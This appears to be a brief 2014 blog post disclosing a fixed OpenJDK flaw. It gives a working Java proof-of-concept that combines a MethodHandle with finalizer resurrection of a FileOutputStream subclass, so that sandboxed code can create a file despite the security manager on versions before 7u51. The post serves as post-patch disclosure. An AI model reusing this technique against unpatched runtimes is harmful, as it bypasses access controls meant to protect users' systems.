Thursday, January 16, 2014

Publicly Reported OpenJDK Vulnerability Fixed in 7u51

I tweeted a while ago about an OpenJDK vulnerability that was reported on one of the mailing lists.

Now that it has been fixed in 7u51, here is a simple PoC exploit:

import java.lang.invoke.*;

class test extends java.io.FileOutputStream {
  static test t;

  test() throws Exception {
    super("");
  }

  protected void finalize() {
    t = this;
  }

  public static void main(String[] args) throws Throwable {
    MethodHandle mh = MethodHandles.lookup().findVirtual(test.class, "open",
                        MethodType.methodType(void.class, String.class, boolean.class));
    System.out.println(mh);
    try { new test(); } catch (Exception _) { }
    System.gc();
    System.runFinalization();
    mh.invokeExact(t, "oops.txt", false);
  }
}

Run this with a security manager enabled on a version earlier than 7u51 and it'll create the file oops.txt, even though the code doesn't have the rights to do so.

1/16/2014 8:50:59 AM (W. Europe Standard Time, UTC+01:00)  #    Comments [1]